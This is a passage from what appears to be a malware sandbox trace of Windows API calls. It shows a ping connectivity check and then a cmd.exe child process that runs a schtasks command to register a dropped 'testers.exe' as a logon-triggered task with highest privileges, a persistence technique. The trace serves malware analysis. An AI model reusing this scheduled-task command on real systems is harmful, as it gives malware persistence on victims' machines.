pServiceBuffer=0x0) returned 0 [0077.075] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xef7b8, nSize=0x0, Arguments=0xef7b4 | out: lpBuffer="0d5") returned 0x5a [0077.075] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for 1.1.1.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x356430, cchDstLength=0x5a | out: lpszDst="\r\nPing statistics for 1.1.1.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0077.075] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0077.075] _write (in: _FileHandle=1, _Buf=0x356430*, _MaxCharCount=0x5a | out: _Buf=0x356430*) returned 90 [0077.075] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0077.075] LocalFree (hMem=0x356430) returned 0x0 [0077.075] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xef7c8, nSize=0x0, Arguments=0xef7c4 | out: lpBuffer="0d5") returned 0x64 [0077.075] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 14ms, Maximum = 17ms, Average = 15ms\r\n", lpszDst=0x356430, cchDstLength=0x64 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 14ms, Maximum = 17ms, Average = 15ms\r\n") returned 1 [0077.075] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0077.075] _write (in: _FileHandle=1, _Buf=0x356430*, _MaxCharCount=0x64 | out: _Buf=0x356430*) returned 100 [0077.076] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0077.076] LocalFree (hMem=0x356430) returned 0x0 [0077.076] IcmpCloseHandle (IcmpHandle=0x348bf0) returned 1 [0077.195] LocalFree (hMem=0x34b7a8) returned 0x0 [0077.195] LocalFree (hMem=0x354138) returned 0x0 [0077.195] WSACleanup () returned 0 [0077.260] exit (_Code=0) Thread: id = 9 os_tid = 0x410 Thread: id = 10 os_tid = 0x7ec Thread: id = 14 os_tid = 0x83c Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x294e1000" os_pid = "0x704" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x634" cmd_line = "C:\\Windows\\system32\\cmd.exe /c schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 11 os_tid = 0x4fc [0073.381] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x39ff74 | out: lpSystemTimeAsFileTime=0x39ff74*(dwLowDateTime=0xc8e93440, dwHighDateTime=0x1d661bd)) [0073.381] GetCurrentProcessId () returned 0x704 [0073.381] GetCurrentThreadId () returned 0x4fc [0073.381] GetTickCount () returned 0x114950f [0073.381] QueryPerformanceCounter (in: lpPerformanceCount=0x39ff6c | out: lpPerformanceCount=0x39ff6c*=19370384624) returned 1 [0073.382] GetModuleHandleA (lpModuleName=0x0) returned 0x4a680000 [0073.382] __set_app_type (_Type=0x1) [0073.382] __p__fmode () returned 0x770331f4 [0073.383] __p__commode () returned 0x770331fc [0073.383] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a6a21a6) returned 0x0 [0073.383] __getmainargs (in: _Argc=0x4a6a4238, _Argv=0x4a6a4240, _Env=0x4a6a423c, _DoWildCard=0, _StartInfo=0x4a6a4140 | out: _Argc=0x4a6a4238, _Argv=0x4a6a4240, _Env=0x4a6a423c) returned 0 [0073.383] GetCurrentThreadId () returned 0x4fc [0073.383] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x4fc) returned 0x60 [0073.383] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0073.383] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0073.383] SetThreadUILanguage (LangId=0x0) returned 0x409 [0073.387] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0073.387] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x39ff04 | out: phkResult=0x39ff04*=0x0) returned 0x2 [0073.388] VirtualQuery (in: lpAddress=0x39ff3b, lpBuffer=0x39fed4, dwLength=0x1c | out: lpBuffer=0x39fed4*(BaseAddress=0x39f000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0073.388] VirtualQuery (in: lpAddress=0x2a0000, lpBuffer=0x39fed4, dwLength=0x1c | out: lpBuffer=0x39fed4*(BaseAddress=0x2a0000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0073.388] VirtualQuery (in: lpAddress=0x2a1000, lpBuffer=0x39fed4, dwLength=0x1c | out: lpBuffer=0x39fed4*(BaseAddress=0x2a1000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0073.388] VirtualQuery (in: lpAddress=0x2a3000, lpBuffer=0x39fed4, dwLength=0x1c | out: lpBuffer=0x39fed4*(BaseAddress=0x2a3000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0073.388] VirtualQuery (in: lpAddress=0x3a0000, lpBuffer=0x39fed4, dwLength=0x1c | out: lpBuffer=0x39fed4*(BaseAddress=0x3a0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x100000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0073.388] GetConsoleOutputCP () returned 0x1b5 [0073.388] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6a4260 | out: lpCPInfo=0x4a6a4260) returned 1 [0073.388] SetConsoleCtrlHandler (HandlerRoutine=0x4a69e72a, Add=1) returned 1 [0073.388] _get_osfhandle (_FileHandle=1) returned 0x7 [0073.388] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0073.389] _get_osfhandle (_FileHandle=1) returned 0x7 [0073.389] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a6a41ac | out: lpMode=0x4a6a41ac) returned 1 [0073.389] _get_osfhandle (_FileHandle=1) returned 0x7 [0073.389] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0073.389] _get_osfhandle (_FileHandle=0) returned 0x3 [0073.389] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a6a41b0 | out: lpMode=0x4a6a41b0) returned 1 [0073.389] _get_osfhandle (_FileHandle=0) returned 0x3 [0073.389] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0073.389] GetEnvironmentStringsW () returned 0x632130* [0073.390] GetProcessHeap () returned 0x620000 [0073.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xada) returned 0x632c18 [0073.390] FreeEnvironmentStringsW (penv=0x632130) returned 1 [0073.390] GetProcessHeap () returned 0x620000 [0073.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x4) returned 0x6318d0 [0073.390] GetEnvironmentStringsW () returned 0x632130* [0073.390] GetProcessHeap () returned 0x620000 [0073.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xada) returned 0x633700 [0073.390] FreeEnvironmentStringsW (penv=0x632130) returned 1 [0073.390] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39ee74 | out: phkResult=0x39ee74*=0x68) returned 0x0 [0073.390] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39ee7c, lpData=0x39ee80, lpcbData=0x39ee78*=0x1000 | out: lpType=0x39ee7c*=0x0, lpData=0x39ee80*=0x0, lpcbData=0x39ee78*=0x1000) returned 0x2 [0073.391] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39ee7c, lpData=0x39ee80, lpcbData=0x39ee78*=0x1000 | out: lpType=0x39ee7c*=0x4, lpData=0x39ee80*=0x1, lpcbData=0x39ee78*=0x4) returned 0x0 [0073.391] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39ee7c, lpData=0x39ee80, lpcbData=0x39ee78*=0x1000 | out: lpType=0x39ee7c*=0x0, lpData=0x39ee80*=0x1, lpcbData=0x39ee78*=0x1000) returned 0x2 [0073.391] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39ee7c, lpData=0x39ee80, lpcbData=0x39ee78*=0x1000 | out: lpType=0x39ee7c*=0x4, lpData=0x39ee80*=0x0, lpcbData=0x39ee78*=0x4) returned 0x0 [0073.391] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39ee7c, lpData=0x39ee80, lpcbData=0x39ee78*=0x1000 | out: lpType=0x39ee7c*=0x4, lpData=0x39ee80*=0x40, lpcbData=0x39ee78*=0x4) returned 0x0 [0073.391] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39ee7c, lpData=0x39ee80, lpcbData=0x39ee78*=0x1000 | out: lpType=0x39ee7c*=0x4, lpData=0x39ee80*=0x40, lpcbData=0x39ee78*=0x4) returned 0x0 [0073.391] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39ee7c, lpData=0x39ee80, lpcbData=0x39ee78*=0x1000 | out: lpType=0x39ee7c*=0x0, lpData=0x39ee80*=0x40, lpcbData=0x39ee78*=0x1000) returned 0x2 [0073.391] RegCloseKey (hKey=0x68) returned 0x0 [0073.391] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39ee74 | out: phkResult=0x39ee74*=0x68) returned 0x0 [0073.391] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39ee7c, lpData=0x39ee80, lpcbData=0x39ee78*=0x1000 | out: lpType=0x39ee7c*=0x0, lpData=0x39ee80*=0x40, lpcbData=0x39ee78*=0x1000) returned 0x2 [0073.391] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39ee7c, lpData=0x39ee80, lpcbData=0x39ee78*=0x1000 | out: lpType=0x39ee7c*=0x4, lpData=0x39ee80*=0x1, lpcbData=0x39ee78*=0x4) returned 0x0 [0073.391] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39ee7c, lpData=0x39ee80, lpcbData=0x39ee78*=0x1000 | out: lpType=0x39ee7c*=0x0, lpData=0x39ee80*=0x1, lpcbData=0x39ee78*=0x1000) returned 0x2 [0073.391] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39ee7c, lpData=0x39ee80, lpcbData=0x39ee78*=0x1000 | out: lpType=0x39ee7c*=0x4, lpData=0x39ee80*=0x0, lpcbData=0x39ee78*=0x4) returned 0x0 [0073.391] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39ee7c, lpData=0x39ee80, lpcbData=0x39ee78*=0x1000 | out: lpType=0x39ee7c*=0x4, lpData=0x39ee80*=0x9, lpcbData=0x39ee78*=0x4) returned 0x0 [0073.391] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39ee7c, lpData=0x39ee80, lpcbData=0x39ee78*=0x1000 | out: lpType=0x39ee7c*=0x4, lpData=0x39ee80*=0x9, lpcbData=0x39ee78*=0x4) returned 0x0 [0073.391] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39ee7c, lpData=0x39ee80, lpcbData=0x39ee78*=0x1000 | out: lpType=0x39ee7c*=0x0, lpData=0x39ee80*=0x9, lpcbData=0x39ee78*=0x1000) returned 0x2 [0073.391] RegCloseKey (hKey=0x68) returned 0x0 [0073.391] time (in: timer=0x0 | out: timer=0x0) returned 0x5f1ae118 [0073.391] srand (_Seed=0x5f1ae118) [0073.391] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe" [0073.391] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe" [0073.392] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6a5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0073.392] GetProcessHeap () returned 0x620000 [0073.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x210) returned 0x632130 [0073.392] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x632138, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0073.392] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a6b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0073.392] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0073.392] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a6b0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0073.392] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0073.392] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0073.392] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0073.392] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0073.392] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0073.392] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0073.392] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0073.392] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0073.392] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0073.392] GetProcessHeap () returned 0x620000 [0073.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x632c18 | out: hHeap=0x620000) returned 1 [0073.392] GetEnvironmentStringsW () returned 0x632348* [0073.392] GetProcessHeap () returned 0x620000 [0073.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xaf2) returned 0x634ce8 [0073.393] FreeEnvironmentStringsW (penv=0x632348) returned 1 [0073.393] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a6b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0073.393] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a6b0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0073.393] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0073.393] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0073.393] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0073.393] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0073.393] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0073.393] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0073.393] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0073.393] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0073.393] GetProcessHeap () returned 0x620000 [0073.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x54) returned 0x631800 [0073.393] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x39fc40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0073.393] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x39fc40, lpFilePart=0x39fc3c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x39fc3c*="Desktop") returned 0x25 [0073.393] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0073.393] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x39f9bc | out: lpFindFileData=0x39f9bc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6357e8 [0073.393] FindClose (in: hFindFile=0x6357e8 | out: hFindFile=0x6357e8) returned 1 [0073.394] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x39f9bc | out: lpFindFileData=0x39f9bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x620ff0 [0073.394] FindClose (in: hFindFile=0x620ff0 | out: hFindFile=0x620ff0) returned 1 [0073.394] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0073.394] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x39f9bc | out: lpFindFileData=0x39f9bc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc1a62260, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc1a62260, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x620ff0 [0073.394] FindClose (in: hFindFile=0x620ff0 | out: hFindFile=0x620ff0) returned 1 [0073.394] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0073.394] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0073.394] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0073.394] GetProcessHeap () returned 0x620000 [0073.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x634ce8 | out: hHeap=0x620000) returned 1 [0073.394] GetEnvironmentStringsW () returned 0x6341e8* [0073.394] GetProcessHeap () returned 0x620000 [0073.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xb46) returned 0x634d38 [0073.394] FreeEnvironmentStringsW (penv=0x6341e8) returned 1 [0073.394] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6a5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0073.394] GetProcessHeap () returned 0x620000 [0073.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x631800 | out: hHeap=0x620000) returned 1 [0073.394] GetProcessHeap () returned 0x620000 [0073.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x400e) returned 0x635888 [0073.395] GetProcessHeap () returned 0x620000 [0073.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xc6) returned 0x620ff0 [0073.395] GetProcessHeap () returned 0x620000 [0073.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635888 | out: hHeap=0x620000) returned 1 [0073.395] GetConsoleOutputCP () returned 0x1b5 [0073.395] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6a4260 | out: lpCPInfo=0x4a6a4260) returned 1 [0073.395] GetUserDefaultLCID () returned 0x409 [0073.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a6a4950, cchData=8 | out: lpLCData=":") returned 2 [0073.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x39fd80, cchData=128 | out: lpLCData="0") returned 2 [0073.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x39fd80, cchData=128 | out: lpLCData="0") returned 2 [0073.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x39fd80, cchData=128 | out: lpLCData="1") returned 2 [0073.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a6a4940, cchData=8 | out: lpLCData="/") returned 2 [0073.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a6a4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0073.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a6a4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0073.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a6a4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0073.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a6a4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0073.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a6a4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0073.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a6a4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0073.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a6a4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0073.396] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a6a4930, cchData=8 | out: lpLCData=".") returned 2 [0073.396] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a6a4920, cchData=8 | out: lpLCData=",") returned 2 [0073.396] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0073.397] GetProcessHeap () returned 0x620000 [0073.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20c) returned 0x6210c0 [0073.398] GetConsoleTitleW (in: lpConsoleTitle=0x6210c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0073.398] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0073.398] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0073.398] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0073.398] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0073.398] GetProcessHeap () returned 0x620000 [0073.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x400a) returned 0x635888 [0073.398] GetProcessHeap () returned 0x620000 [0073.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635888 | out: hHeap=0x620000) returned 1 [0073.399] _wcsicmp (_String1="schtasks", _String2=")") returned 74 [0073.399] _wcsicmp (_String1="FOR", _String2="schtasks") returned -13 [0073.399] _wcsicmp (_String1="FOR/?", _String2="schtasks") returned -13 [0073.399] _wcsicmp (_String1="IF", _String2="schtasks") returned -10 [0073.399] _wcsicmp (_String1="IF/?", _String2="schtasks") returned -10 [0073.399] _wcsicmp (_String1="REM", _String2="schtasks") returned -1 [0073.399] _wcsicmp (_String1="REM/?", _String2="schtasks") returned -1 [0073.399] GetProcessHeap () returned 0x620000 [0073.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x58) returned 0x632e98 [0073.399] GetProcessHeap () returned 0x620000 [0073.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1a) returned 0x620830 [0073.401] GetProcessHeap () returned 0x620000 [0073.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xb2) returned 0x632ef8 [0073.402] GetConsoleTitleW (in: lpConsoleTitle=0x39fa78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0073.403] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0073.403] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0073.403] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0073.403] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0073.403] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0073.403] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0073.403] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0073.403] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0073.403] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0073.403] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0073.403] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0073.403] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0073.403] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0073.403] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0073.403] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0073.403] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0073.403] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0073.403] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0073.403] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0073.403] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0073.403] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0073.403] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0073.403] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0073.403] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0073.403] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0073.403] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0073.403] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0073.404] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0073.404] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0073.404] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0073.404] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0073.404] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0073.404] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0073.404] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0073.404] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0073.404] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0073.404] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0073.404] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0073.404] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0073.404] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0073.404] _wcsicmp (_String1="schtasks", 